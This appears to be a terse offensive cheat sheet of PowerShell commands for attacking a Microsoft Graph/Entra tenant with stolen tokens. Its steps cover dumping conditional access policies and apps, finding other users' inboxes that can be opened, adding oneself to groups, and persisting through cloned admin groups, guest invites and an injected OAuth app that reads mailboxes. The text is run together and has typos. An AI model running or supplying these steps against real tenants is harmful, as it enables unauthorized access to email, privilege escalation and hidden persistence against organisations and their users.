PS> Invoke-GraphReconPS> Invoke-DumpCAPS -Tokens $tokensPS> Invoke-DumpApps# check if you can access other email adressesPS> Invoke-GraphOpenInboxFinder -Tokens $tokens -userlist .\users.txt# check if you can join any groupPS> Get-UpdatableGroups -Tokens $tokensPS> Invoke-AddGroupMemer -Tokens $token -GroupId id -userId user-id# dynamic groupsPS> Get-DynamicGroups -Tokens $tokens
persistence
default ability to
create groups
invite guests
create apps
# clone a group with a name, copy other users to that, add your own user to it# do this with 'adminitrators', 'site-admins'PS> Invoke-SecurityGroupCloner# guest usersPS> Invoke-InviteGuest# oauth appPS> Invoke-InjectOAuthApp# will create an $apptokenPS> Invoke-GraphOpenInboxFinder -Tokens $apptokens -userlist .\userlist.txtPS> Get-Inbox -Tokens $apptokens ...